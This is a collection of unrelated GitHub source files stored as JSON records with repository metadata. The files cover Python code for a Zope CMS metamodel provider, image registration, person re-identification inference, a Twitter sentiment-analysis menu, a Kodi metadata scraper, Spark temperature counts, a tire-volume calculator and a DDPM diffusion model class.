manage_sub_options(self):\r\n return (\r\n {'label': 'TAB_METADATA','action': 'manage_metas'},\r\n {'label': 'TAB_METAOBJ','action': 'manage_main'},\r\n )\r\n\r\n # Management Interface.\r\n # ---------------------\r\n manage = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_main', globals())\r\n manage_main = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_main', globals())\r\n manage_main_import = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_main_import', globals())\r\n manage_main_acquire = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_main_acquire', globals())\r\n manage_bigpicture = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_bigpicture', globals())\r\n manage_analyze = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_analyze', globals())\r\n manage_metas = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_metas', globals())\r\n manage_readme = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_readme', globals())\r\n manage_readme_iframe = PageTemplateFile('zpt/ZMSMetamodelProvider/manage_readme_iframe', 
globals())\r\n\r\n # Management Permissions.\r\n # -----------------------\r\n __administratorPermissions__ = (\r\n 'manage_changeProperties', 'manage_ajaxChangeProperties', 'manage_main', 'manage_main_import', 'manage_bigpicture',\r\n 'manage_changeMetaProperties', 'manage_metas',\r\n )\r\n __ac_permissions__=(\r\n ('ZMS Administrator', __administratorPermissions__),\r\n )\r\n\r\n ############################################################################\r\n # ZMSMetamodelProvider.__init__: \r\n #\r\n # Constructor.\r\n ############################################################################\r\n def __init__(self, model={}, metas=[]):\r\n self.id = 'metaobj_manager'\r\n self.model = model.copy()\r\n self.metas = copy.deepcopy(metas)\r\n\r\n # @see _confmanager:TemplateWrapper.__get__\r\n def getConfProperty(self, key, default=None):\r\n v = default\r\n try:\r\n if self.content is not None:\r\n v = self.content.getConfProperty(key, default)\r\n except:\r\n pass\r\n return v\r\n\r\n # --------------------------------------------------------------------------\r\n # ZMSMetamodelProvider.__bobo_traverse__\r\n # --------------------------------------------------------------------------\r\n def __bobo_traverse__(self, TraversalRequest, name):\r\n \r\n # If the name is in the list of attributes, call it.\r\n attr = getattr( self, name, None)\r\n if attr is not None:\r\n return attr\r\n \r\n # otherwise do some 'magic'\r\n else:\r\n standard.writeLog(self, \"[ZMSMetamodelProvider.__bobo_traverse__]: otherwise do some 'magic'\")\r\n ob = self.getHome().aq_parent\r\n while ob is not None:\r\n content = getattr( ob, 'content', None)\r\n if content is not None:\r\n metaobj_manager = getattr( content, self.id, None)\r\n if metaobj_manager is not None:\r\n # If the name is in the list of attributes, call it.\r\n attr = getattr( metaobj_manager, name, None)\r\n if attr is not None:\r\n return attr\r\n ob = getattr( ob, 'aq_parent', None)\r\n return None\r\n\r\n\r\n ############################################################################\r\n #\r\n # IRepositoryProvider\r\n #\r\n ############################################################################\r\n\r\n \"\"\"\r\n @see IRepositoryProvider\r\n \"\"\"\r\n def provideRepository(self, ids=None):\r\n standard.writeBlock(self, \"[provideRepository]: ids=%s\"%str(ids))\r\n r = {}\r\n self.provideRepositoryMetas(r, ids)\r\n self.provideRepositoryModel(r, ids)\r\n return r\r\n\r\n \"\"\"\r\n @see IRepositoryProvider\r\n \"\"\"\r\n def updateRepository(self, r):\r\n id = r['id']\r\n self.updateRepositoryMetas(r)\r\n self.updateRepositoryModel(r)\r\n return id\r\n\r\n################################################################################\r\n","repo_name":"zms-publishing/ZMS","sub_path":"Products/zms/ZMSMetamodelProvider.py","file_name":"ZMSMetamodelProvider.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"70"}
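# What ZMSMetamodelProvider.manage_options() above effectively does, shown standalone:
# it deep-copies the parent's option dicts and prefixes each action with '../' so the
# management tabs resolve relative to this sub-object. This is a plain-Python sketch
# (dict() instead of the operator_setitem helper); no Zope installation is required.
import copy

parent_options = [
    {'label': 'TAB_METADATA', 'action': 'manage_metas'},
    {'label': 'TAB_METAOBJ', 'action': 'manage_main'},
]
rebased = [dict(x, action='../' + x['action']) for x in copy.deepcopy(parent_options)]
print(rebased)  # [{'label': 'TAB_METADATA', 'action': '../manage_metas'}, ...]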
+{"seq_id":"10701362641","text":"import numpy as np\nimport cv2\n\ndef ripoc(a, b, m = None):\n g_a = np.asarray(cv2.cvtColor(a, cv2.COLOR_BGR2GRAY), 'float')\n g_b = np.asarray(cv2.cvtColor(b, cv2.COLOR_BGR2GRAY), 'float')\n\n h, w = g_a.shape\n hy = np.hanning(h)\n hx = np.hanning(w)\n hw = hy.reshape(h, 1)*hx\n \n f_a = np.fft.fftshift(np.log(np.abs(np.fft.fft2(g_a*hw))))\n f_b = np.fft.fftshift(np.log(np.abs(np.fft.fft2(g_b*hw))))\n\n if not m:\n l = np.sqrt(w*w + h*h)\n m = l/np.log(l)\n\n center = (w/2, h/2)\n flags = cv2.INTER_LANCZOS4 + cv2.WARP_POLAR_LOG\n p_a = cv2.warpPolar(f_a, (w, h), center, m, flags)\n p_b = cv2.warpPolar(f_b, (w, h), center, m, flags)\n (x, y), e = cv2.phaseCorrelate(p_a, p_b, hw)\n\n angle = y*360/h\n scale = (np.e)**(x/m)\n M = cv2.getRotationMatrix2D(center, angle, scale)\n t_b = cv2.warpAffine((g_b), M, (w, h))\n (x, y), e = cv2.phaseCorrelate(g_a, t_b)\n\n return x, y, angle, scale\n\nimg1 = cv2.imread(\"/home/nowatari/repos/isou/mandrill.png\")\nimg2 = cv2.imread(\"/home/nowatari/repos/isou/mandrill-s.png\")\n\nx, y, angle, scale = ripoc(img1, img2)\nprint(x, y, angle, scale)\n\nh, w, ch = img1.shape\nM = cv2.getRotationMatrix2D((w/2,h/2), angle, scale)\nM[0][2] -= x\nM[1][2] -= y\n\ndst = cv2.warpAffine(img2, M, (w, h))\ncv2.imwrite(\"/home/nowatari/repos/isou/mandrill-t.png\", dst)","repo_name":"NowatariSoma/Library_For_Research","sub_path":"isou/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72800282147","text":"\"\"\"\r\nGiven two sorted arrays nums1 and nums2 of size m and n respectively,\r\nreturn the median of the two sorted arrays.\r\nThe overall run time complexity should be O(log (m+n)).\r\n\"\"\"\r\n\r\nnums1 = [1, 3]\r\nnums2 = [2]\r\nnew_lst = sorted(nums1 + nums2)\r\nif len(new_lst) % 2 == 0:\r\n median = (new_lst[len(new_lst)//2 - 1] + new_lst[len(new_lst)//2]) / 2\r\nelse:\r\n median = new_lst[len(new_lst)//2]\r\nprint(median)","repo_name":"ArpineKeyan/Programming_Course_Python_CR","sub_path":"Coding_Marathon/Day1/Median of Two Sorted Arrays.py","file_name":"Median of Two Sorted Arrays.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11257877754","text":"import os\nimport os.path as osp\nimport random\nimport shutil\nimport torch\nimport torchvision.transforms as transformers\nfrom PIL import Image\nfrom PersonReID.model.FFusion import FFusion, FFusion_cnn, FFusion_deit\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nif device == \"cuda\":\n torch.cuda.set_device(1)\n\ndef read_image(img_path):\n \"\"\"Keep reading image until succeed.\n This can avoid IOError incurred by heavy IO process.\"\"\"\n global img\n got_img = False\n if not osp.exists(img_path):\n raise IOError(\"{} does not exist\".format(img_path))\n while not got_img:\n try:\n img = Image.open(img_path).convert('RGB')\n got_img = True\n except IOError:\n print(\"IOError incurred when reading '{}'. Will redo. Don't worry. Just chill.\".format(img_path))\n pass\n return img\n\ndef get_img(file_dir, num, tar_dir=None):\n path = os.listdir(file_dir) # 获得图片的原始路径\n # file_num = len(pathDir) # 数据总量\n # img_num = int(file_num * rate)\n sample = random.sample(path, num) # 随机选取img_num数量的样本图片\n # print(sample)\n if tar_dir:\n for name in sample:\n shutil.copy(file_dir+name, tar_dir+name)\n return sample\n\ndef del_files(path_file):\n ls = os.listdir(path_file)\n for i in ls:\n f_path = os.path.join(path_file, i)\n # 判断是否是一个目录,若是,则递归删除\n if os.path.isdir(f_path):\n del_files(f_path)\n else:\n os.remove(f_path)\n\ndef check_dir(file):\n if os.path.exists(file):\n sz = os.path.getsize(file)\n if sz:\n del_files(file)\n else:\n os.makedirs(file)\n\ndef euclidean_distance(qf, gf):\n m = qf.shape[0]\n n = gf.shape[0]\n dist_mat = torch.pow(qf, 2).sum(dim=1, keepdim=True).expand(m, n) + \\\n torch.pow(gf, 2).sum(dim=1, keepdim=True).expand(n, m).t()\n dist_mat.addmm_(1, -2, qf, gf.t())\n dist_mat.detach().cpu().numpy()\n return dist_mat\n\ndef load(model_name, dataset_name, gallery_num):\n # -----------加载模型----------------\n model_factory = {\n \"ResNet50\": FFusion_cnn,\n \"DeiT\": FFusion_deit,\n \"FFusion\": FFusion\n }\n dataset_classes = {\n \"Market1501\": 751,\n \"DukeMTMC-reID\": 702\n }\n model = model_factory[model_name](num_classes=dataset_classes[dataset_name])\n model.load_param('PersonReID/logs/{}/{}_100.pth'.format(dataset_name, model_name)) #加载预训练好的参数\n model.to(device)\n model.eval()\n\n infer_transforms = transformers.Compose([\n transformers.Resize([256, 128]),\n transformers.ToTensor(),\n transformers.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n query_dir = 'PersonReID/data/{}/query/'.format(dataset_name)\n query_tardir = 'PersonReID/data/inference/query/'\n check_dir(query_tardir) # 检查目录是否存在并清除上一次采样的数据\n\n gallery_dir = 'PersonReID/data/{}/bounding_box_test/'.format(dataset_name)\n gallery_tardir = 'PersonReID/data/inference/gallery/'\n check_dir(gallery_tardir)\n\n query_sample = get_img(query_dir, 1, query_tardir) # query_sample存放采样的query图片的名称\n query_img = read_image(query_tardir+query_sample[0])\n query_trans = infer_transforms(query_img).unsqueeze(0).to(device)\n query_feat = model(query_trans)\n\n gallery_sample = get_img(gallery_dir, gallery_num, gallery_tardir) # gallery_sample存放采样的gallery图片的名称\n gallery2dis = {}\n for sample in gallery_sample:\n gallery_img = read_image(gallery_tardir+sample)\n gallery_trans = infer_transforms(gallery_img).unsqueeze(0).to(device)\n gallery_feat = model(gallery_trans)\n distance = euclidean_distance(query_feat, gallery_feat)\n gallery2dis[sample] = '%.3f' % float(distance)\n return query_sample, 
gallery2dis\n","repo_name":"LJunJing/reid_sys","sub_path":"PersonReID/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3013035829","text":"#!/usr/bin/env python3\n\nimport os\nfrom py.CreateClassifiers import create_classifiers, cleanup_classifiers\nfrom py.DrawGraph import draw_piechart\nfrom py.StoreTweetReview import cleanup_reviews, store\nfrom py.GetLiveTweets import cleanup_tweets, get_live_tweets\nfrom py.GetSearchTweets import get_search_tweets\nfrom py.AnalysisWithAffin import analyse_with_affin\nfrom py.AnalysisWithOpinionLexicon import analyse_with_opinion\nfrom py.CreateDatasetWithTweets import create_dataset\n\nif os.name == 'nt':\n clear_screen = \"cls\"\nelse:\n clear_screen = \"clear\"\n\ndef main():\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tSentiment Analysis\")\n print(\"\\t\\t\\t\" + 18 * \"-\")\n print(\"\\nOptions:-\\n\")\n print(\"1. Get live tweets using Tweepy\\n2. Get search tweets using Tweepy\\n3. Show first 10 tweets\\n4. Sentiment Analysis using NLTK's Opinion Lexicon\\n5. Sentiment Analysis using AFINN-111.txt\\n6. Sentiment Analysis using Machine Learning Algorithms\\n7. Exit\")\n c = input(\"\\nCHOICE: \")\n try:\n c = int(c)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue.....\")\n continue\n if c < 1 or c > 7:\n print(\"Enter a value between 1 and 6\")\n input(\"Press ENTER to continue.....\")\n continue\n\n if c == 1:\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tGet live tweets using Tweepy\")\n print(\"\\t\\t\\t----------------------------\")\n print(\"\\nINFO:\\tThis option will fetch live tweets from Twitter using Tweepy API.\\n\\tSince Tweepy is fetching live tweets it is much slower than TwitterSearch API.\\n\\tVery useful if you want to look for current affairs.\\n\\n\")\n\n print(\"1. Delete old tweets in the tweets folder\\n2. Get new tweets\\n3. Go Back\")\n ch = input(\"\\nCHOICE: \")\n try:\n ch = int(ch)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue...\")\n continue\n if ch == 1:\n print(\"Old tweets removed.\")\n cleanup_tweets()\n input(\"Press ENTER to continue...\")\n elif ch == 2:\n search_topic = []\n topic = input(\"Enter topic you need to search: \")\n search_topic.append(topic)\n\n try:\n with open(\"tweets/twitter.txt\", encoding = \"utf_16\") as f:\n lines = len(f.read().split(\"\\n\"))\n except:\n lines = 0\n\n while True:\n tweet_count = input(\"How many tweets do you need? (default is 200): \")\n if tweet_count == \"\":\n get_live_tweets(search_topic, 200, lines)\n break\n try:\n tweet_count = int(tweet_count)\n break\n except:\n print(\"Enter an integer value\")\n\n get_live_tweets(search_topic, tweet_count, lines)\n print(\"\\n\\nNew Tweets fetched\")\n input(\"Press ENTER to continue...\")\n elif ch == 3:\n break\n else:\n print(\"Enter a number between 1 and 3\")\n input(\"Press ENTER to continue...\")\n\n elif c == 2:\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tGet search tweets using Tweepy\")\n print(\"\\t\\t\\t-------------------------------\")\n print(\"\\nINFO:\\tThis option will fetch all except live tweets from Twitter using Tweepy API.\\n\\tSince we are searching instead of live streaming it is much faster.\\n\\tVery useful if you want to look for old events.\\n\\n\")\n\n print(\"1. Delete old tweets in the tweets folder\\n2. Get new tweets\\n3. 
Go Back\")\n ch = input(\"\\nCHOICE: \")\n try:\n ch = int(ch)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue...\")\n continue\n if ch == 1:\n print(\"Old tweets removed.\")\n cleanup_tweets()\n input(\"Press ENTER to continue...\")\n elif ch == 2:\n search_topic = input(\"Enter topic you need to search: \")\n f = 0\n while True:\n tweet_count = input(\"How many tweets do you need? (default is 200): \")\n if tweet_count == \"\":\n f = 1\n break\n try:\n tweet_count = int(tweet_count)\n break\n except:\n print(\"Enter an integer value\")\n\n if f == 0:\n print(\"\\nFetching %d tweets on the topic %s....\" %(tweet_count, search_topic))\n for i in range(int(tweet_count/100)):\n get_search_tweets(search_topic, 100)\n if not tweet_count%100 == 0:\n get_search_tweets(search_topic, tweet_count%100)\n else:\n print(\"\\nFetching 200 tweets on the topic %s....\" %search_topic)\n get_search_tweets(search_topic, 100)\n get_search_tweets(search_topic, 100)\n\n print(\"\\n\\nNew Tweets fetched\")\n input(\"Press ENTER to continue...\")\n elif ch == 3:\n break\n else:\n print(\"Enter a number between 1 and 3\")\n input(\"Press ENTER to continue...\")\n\n\n elif c == 3:\n os.system(clear_screen)\n print(\"\\t\\t\\tFirst 10 tweets\")\n print(\"\\t\\t\\t---------------\\n\\n\")\n with open(\"tweets/twitter.txt\", encoding = \"utf_16\") as f:\n tweets = f.read().split(\"\\n\")\n for tweet in tweets[:10]:\n print(tweet)\n print(\"------------------------------------\")\n input(\"\\n\\nPress ENTER to continue......\")\n\n elif c == 4:\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tSentiment Analysis using NLTK's Opinion Lexicon\")\n print(\"\\t\\t\\t-----------------------------------------------\")\n print(\"\\nINFO:\\tNLTK's opinion lexicon contains lists for posiive and negative words.\\n\\tThis algorithm uses these lists to find out the number of positive and negative words in a tweet.\\n\\tThe number of positive and negative words in the tweet determines if it is positive or negative.\")\n print(\"\\n1. Analyse using Opinion lexicon.\\n2. Go Back\")\n ch = input(\"\\nCHOICE: \")\n try:\n ch = int(ch)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue...\")\n continue\n if ch == 1:\n print(\"Analyzing. Please wait....\")\n analyse_with_opinion()\n input(\"Press ENTER to continue...\")\n elif ch == 2:\n break\n else:\n print(\"Enter a number between 1 and 2\")\n input(\"Press ENTER to continue...\")\n\n elif c == 5:\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tSentiment Analysis using AFINN-111.txt\")\n print(\"\\t\\t\\t--------------------------------------\")\n print(\"\\nINFO:\\tAFINN-111.txt contains a list of posiive and negative words along with their score.\\n\\tThis algorithm uses these scores to find out the total score of positive and negative words in a tweet.\\n\\tThe total score of positive and negative words in the tweet determines if it is positive or negative.\")\n print(\"\\n1. Analyse using AFINN-111.txt.\\n2. Go Back\")\n ch = input(\"\\nCHOICE: \")\n try:\n ch = int(ch)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue...\")\n continue\n if ch == 1:\n print(\"Analyzing. 
Please wait....\")\n analyse_with_affin()\n input(\"Press ENTER to continue...\")\n elif ch == 2:\n break\n else:\n print(\"Enter a number between 1 and 2\")\n input(\"Press ENTER to continue...\")\n\n elif c == 6:\n while True:\n os.system(clear_screen)\n print(\"\\t\\t\\tSentiment Analysis using Machine Learning\")\n print(\"\\t\\t\\t-----------------------------------------\")\n print(\"\\nINFO:\\tThis module trains and creates classifiers which are used to classify the tweets.\\n\\tThe classifiers (which are mainly Machine Learning algorithms) used here are Naive Bayes, Bernoulli Naive Bayes,\\n\\tMultinomial Naive Bayes, Logistic Regression and Stochastic Gradient Descent.\")\n print(\"\\n1. Delete the old trained classifiers\\n2. Train classifiers using new tweets in tweets/twitter.txt\\n3. Analyse tweets using the classifiers and draw pie charts for them.\\n4. Go Back\")\n ch = input(\"\\nCHOICE: \")\n try:\n ch = int(ch)\n except:\n print(\"Enter an integer value\")\n input(\"Press ENTER to continue...\")\n continue\n if ch == 1:\n print(\"Previous classifiers are being wiped out....\")\n cleanup_classifiers()\n input(\"Press ENTER to continue...\")\n elif ch == 2:\n print(\"Dataset is being created.....\")\n create_dataset(\"tweets/twitter.txt\")\n print(\"Classfiers are being created....\")\n create_classifiers()\n input(\"Press ENTER to continue...\")\n elif ch == 3:\n print(\"Analyzing. Please wait....\")\n cleanup_reviews()\n store()\n draw_piechart()\n input(\"Press ENTER to continue...\")\n elif ch == 4:\n break\n else:\n print(\"Enter a number between 1 and 4\")\n input(\"Press ENTER to continue...\")\n\n elif c == 7:\n print(\"Exiting.....\")\n return\n\ntry:\n main()\nexcept KeyboardInterrupt as e:\n print(\"\\n\\nCTRL + C pressed. Exiting....\")\n","repo_name":"EvilPort2/Sentiment-Analysis","sub_path":"sentiment-analysis-main.py","file_name":"sentiment-analysis-main.py","file_ext":"py","file_size_in_byte":11179,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"27637852659","text":"import os\nimport sys\nfrom pathlib import Path\n\nimport xbmc\nimport xbmcgui\nimport xbmcplugin\n\nimport MediaType\nimport movie_actions\nimport param_reader\nimport tv_actions\nfrom find_source_path import find_source_path\nfrom lib import vsmeta_parser\n\n# Actions performed by Kodi\nFIND_ACTION = \"find\"\nGET_DETAILS_ACTION = \"getdetails\"\nGET_EPISODE_LIST_ACTION = \"getepisodelist\"\nGET_EPISODE_DETAILS_ACTION = \"getepisodedetails\"\n\n\ndef get_file_path(title):\n \"\"\"\n Returns the file path of the given media title.\n\n :param title: the media title\n\n :return: the file path to the media title, or None if the file path cannot be determined\n \"\"\"\n folder_path = xbmc.getInfoLabel('Container.FolderPath')\n if os.path.exists(folder_path):\n root_directory = folder_path\n else:\n root_directory = find_source_path(title)\n return next(Path(root_directory).rglob(title + \".*\" + \".vsmeta\"), None) if root_directory else None\n\n\ndef is_tv_show(title):\n \"\"\"\n Returns true if the media title is a TV show.\n This requires the initial \"find\" action to be performed on the media source beforehand.\n\n :param title: The media title\n\n :return: true if the item is a TV show, false otherwise\n \"\"\"\n list_item = xbmcgui.ListItem(title, offscreen=True)\n media_type = list_item.getVideoInfoTag().getMediaType()\n xbmc.log(f\"Media Type: {media_type}\")\n return MediaType.is_tv(media_type)\n\n\ndef get_vsmeta_path(url):\n if not os.path.exists(url):\n return None\n\n if os.path.isfile(url):\n return Path(url + \".vsmeta\")\n else:\n return next(Path(url).rglob(\"*.vsmeta\"), None)\n\n\ndef find(title, plugin_handle):\n xbmc.log(f\"Searching for title: {title}\", xbmc.LOGINFO)\n file_path = get_file_path(title)\n if file_path:\n xbmc.log(f\"Using path '{file_path}' for analyzing {title}\", xbmc.LOGDEBUG)\n\n metadata = vsmeta_parser.parse(str(file_path), False)\n\n if metadata.is_tv_show():\n item_details = tv_actions.find(title, metadata, file_path)\n else:\n item_details = movie_actions.find(title, metadata, file_path)\n\n xbmcplugin.addDirectoryItem(handle=plugin_handle,\n url=str(item_details[\"url\"]),\n listitem=item_details[\"list_item\"],\n isFolder=False)\n else:\n xbmc.log(f\"No vsmeta file found for {title}\", xbmc.LOGWARNING)\n\n\ndef get_details(title, url, plugin_handle):\n xbmc.log(f\"Getting details for {url}\", xbmc.LOGINFO)\n file_path = get_vsmeta_path(url)\n if file_path:\n metadata = vsmeta_parser.parse(str(file_path), True)\n\n if metadata.is_tv_show():\n list_item = tv_actions.get_details(title, metadata, file_path) if file_path else None\n else:\n list_item = movie_actions.get_details(title, metadata, url)\n xbmcplugin.setResolvedUrl(handle=plugin_handle, succeeded=True, listitem=list_item)\n else:\n xbmc.log(f\"No vsmeta file found for at {url}\", xbmc.LOGWARNING)\n\n\ndef get_episode_list(title, url, plugin_handle):\n if os.path.exists(url):\n episodes = tv_actions.get_episode_list(title, url)\n [xbmcplugin.addDirectoryItem(plugin_handle,\n url=episode[\"url\"],\n listitem=episode[\"list_item\"],\n isFolder=True)\n for episode in episodes]\n else:\n xbmc.log(f\"No vsmeta file found for {title} at {url}\", xbmc.LOGWARNING)\n\n\ndef get_episode_details(title, url, plugin_handle):\n metadata_path = url + \".vsmeta\"\n xbmc.log(f\"Reading ${metadata_path}\")\n if os.path.exists(metadata_path):\n list_item = tv_actions.get_episode_details(metadata_path)\n xbmcplugin.setResolvedUrl(plugin_handle, True, list_item)\n else:\n 
xbmc.log(f\"No vsmeta file found for {title} at {url}\", xbmc.LOGWARNING)\n xbmcplugin.setResolvedUrl(plugin_handle, False, xbmcgui.ListItem(offscreen=True))\n\n\ndef scrape(params, plugin_handle):\n \"\"\"\n Scrapes the Synology Videostation VSMeta files to analyze Kodi media items.\n\n Movies and TV shows take slightly different flows.\n Movies use a two-stage analysis process:\n 1. The \"find\" action is initially performed to obtain the title.\n 2. The \"getdetails\" action is performed to obtain the movie details.\n TV Shows use a four-stage analysis process:\n 1. The \"find\" action is initially performed to obtain the TV show title.\n 2. The \"getdetails\" action is performed to obtain the TV show details.\n 3. The \"getepisodelist\" action is performed on the TV show title-level to get the list of episodes.\n 4. Finally, the \"getepisodedetails\" action is performed on each TV show episode to get the details for the episodes.\n\n :param params: the scraper parameters\n :param plugin_handle: the plugin handle ID\n :return: Nothing\n \"\"\"\n action = params.get('action')\n url = params.get('url')\n title = params.get(\"title\")\n\n if action == FIND_ACTION:\n find(title, plugin_handle)\n elif action == GET_DETAILS_ACTION:\n get_details(title, url, plugin_handle)\n elif action == GET_EPISODE_LIST_ACTION:\n get_episode_list(title, url, plugin_handle)\n elif action == GET_EPISODE_DETAILS_ACTION:\n get_episode_details(title, url, plugin_handle)\n else:\n xbmc.log(f\"Unsupported action {action} provided for analyzing {title}\", xbmc.LOGWARNING)\n\n xbmcplugin.endOfDirectory(plugin_handle)\n\n\nscrape(param_reader.read(), int(sys.argv[1]))\n","repo_name":"shaundsmith/kodi-vsmeta","sub_path":"addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":5614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"43924734885","text":"from pyspark import SparkContext\n\nsc = SparkContext(appName=\"countOver10\")\n#lines = sc.textFile(\"/user/x_pauth/data/temperature-readings.csv\").cache()\nlines = sc.textFile(\"data/temperature-readings.csv\").cache()\nlines = lines.map(lambda a: a.split(';'))\nlines = lines.filter(lambda x: int(x[1][0:4]) >= 1950 and int(x[1][0:4]) <= 2014)\nlines = lines.filter(lambda x: float(x[3]) > 10)\n\nstations = lines.map(lambda x: (x[0]+';'+x[1][:7], 1))\nstations = stations.reduceByKey(lambda v1, v2: v1)\n\nover10 = stations.map(lambda x: (x[0].split(';')[1], 1))\n\ncntOver10 = over10.reduceByKey(lambda v1, v2: v1+v2)\n#cntOver10.saveAsTextFile(\"/user/x_pauth/results/cntOver10StationsUnique\")\ncntOver10.saveAsTextFile(\"results/cntOver10StationsUnique\")\n","repo_name":"PolacekTomas/TDDE31_big-data-analytics","sub_path":"lab1-final/lab1_task2b.py","file_name":"lab1_task2b.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72062069026","text":"import csv\nimport os\nimport signal\nimport numpy as np\nimport node as nd\n\n#read mapping of APP & pid\ndef ReadTable():\n\twith open('table.csv',\"r\") as fp:\n\t\treader = csv.reader(fp)\n\t\tdict={rows[0]:rows[1] for rows in reader}\n\treturn dict \ndef sendSignal(pid):\n\tos.kill(pid,signal.SIGUSR1)\n\ndef extractInfo():\n\twith open('app//app.info',\"r\") as fp:\n\t\tcontents = fp.readlines()\n\t\tfor content in contents:\n\t\t\t[a,b]=content.rstrip('\\n').split(':')\n\t\t\tnd.Node()\n#\t\tprint(a)\n#\t\tprint(b)\n\ndict = ReadTable()\n\nprint(dict['bfs_2'])\n\n#ID = dict['bfs']\n#sendSignal(ID);\nextractInfo()\n\n","repo_name":"yachiyang01/computeNode","sub_path":"profiler/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9639390996","text":"# Import the math module so I can use math.pi and math.sqrt.\nimport math\nfrom datetime import datetime, timedelta\n\ncurrent_date = datetime.now().date()\n\nwarranty_duration = timedelta(weeks=1)\nwaranty_date = current_date + warranty_duration\n\nnew = input('Are these new tires? (yes or no): ')\nnew = new.lower()\n\n# Get the width, aspect ratio, and diameter of the tire\nwidth = abs(float(input('Enter the width of the tire in mm (ex 205): ')))\nratio = abs(float(input('Enter the aspect ratio of the tire (ex 60): ')))\ndiameter = abs(float(input('Enter the diameter of the wheel in inches (ex 15): ')))\n\n# Compute the volume of the tire\nbracket = width * ratio + 2540 * diameter\nvolume = math.pi * width**2 * ratio * bracket / 10000000000\n\n#Round the volume to two digits after the decimal point\nvolume = round(volume, 2)\n\n# Print the volume for the user to see\nprint(f'The approximate volume is {volume} liters')\n\n# open volumes.txt\n# add line to it with the following data:\n # current date\n # width of the tire\n # aspect ratio of the tire\n # diameter of the wheel\n # volume of the tire\n\nwith open('volumes.txt', 'at') as volumes_file:\n if new == 'yes':\n response = f'These tires are under waranty until {waranty_date}'\n \n else:\n \n response = 'These tires are not under waranty'\n \n print(f'{current_date}, {width:.0f}, {ratio:.0f}, {diameter:.0f}, {volume:.02f}', file=volumes_file)\n print(f'{response}', file=volumes_file)\n\n","repo_name":"JacobHoltby/cse111","sub_path":"python tire_volume.py","file_name":"python tire_volume.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15259072528","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef log_odds(p):\n return np.log(p / (1 - p))\n\nx = np.arange(0.005, 1, 0.005)\nlog_odds_x = log_odds(x)\n\nplt.plot(x, log_odds_x)\nplt.axvline(0.0, color='k')\nplt.ylim(-8, 8)\nplt.xlabel('x')\nplt.ylabel('log_odds(x)')\n\n# y axis ticks and gridline\nplt.yticks([-7, 0, 7])\nax = plt.gca()\nax.yaxis.grid(True)\n\nplt.tight_layout()\nplt.show()\n","repo_name":"NMHai/Kaggle-Titanic","sub_path":"logOddRatio.py","file_name":"logOddRatio.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30310636655","text":"import os\nfrom pathlib import Path\nfrom typing import Dict\n\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn.functional as F\nfrom accelerate import Accelerator\nfrom diffusers import DDPMScheduler, UNet2DModel, __version__\nfrom diffusers.optimization import get_scheduler\nfrom diffusers.pipelines import DDPMPipeline\nfrom diffusers.training_utils import EMAModel\nfrom diffusers.utils import deprecate\nfrom packaging import version\nfrom PIL import Image\nfrom torch import nn\nfrom tqdm import tqdm\n\nfrom config import DDPMTrainConfig\n\ndiffusers_version = version.parse(version.parse(__version__).base_version)\n\n\nclass DDPM(nn.Module):\n def __init__(self, config: DDPMTrainConfig):\n \"\"\"\n Denoising Diffusion Probabilistic Model.\n\n Initializes a UNet2D model and can be used to train a Denoising Diffusion Probabilistic Model in order to generate images by running the train method\n\n Args:\n config: Config object containing the model and training parameters\n\n Reference:\n https://proceedings.neurips.cc/paper/2020/file/4c5bcfec8584af0d967f1ab10179ca4b-Paper.pdf\n \"\"\"\n super(DDPM, self).__init__()\n self.config = config\n self.model = UNet2DModel(\n sample_size=config.image_size,\n in_channels=config.channels,\n out_channels=config.channels,\n layers_per_block=2,\n block_out_channels=(128, 128, 256, 256, 512, 512),\n down_block_types=config.downblock_types,\n up_block_types=config.upblock_types,\n )\n\n self.noise_scheduler = None\n self.optimizer = None\n self.lr_scheduler = None\n\n self.logger = None\n self.wandb_run_id = None\n self.wandb_run_name = None\n\n self.global_step = 0\n\n def 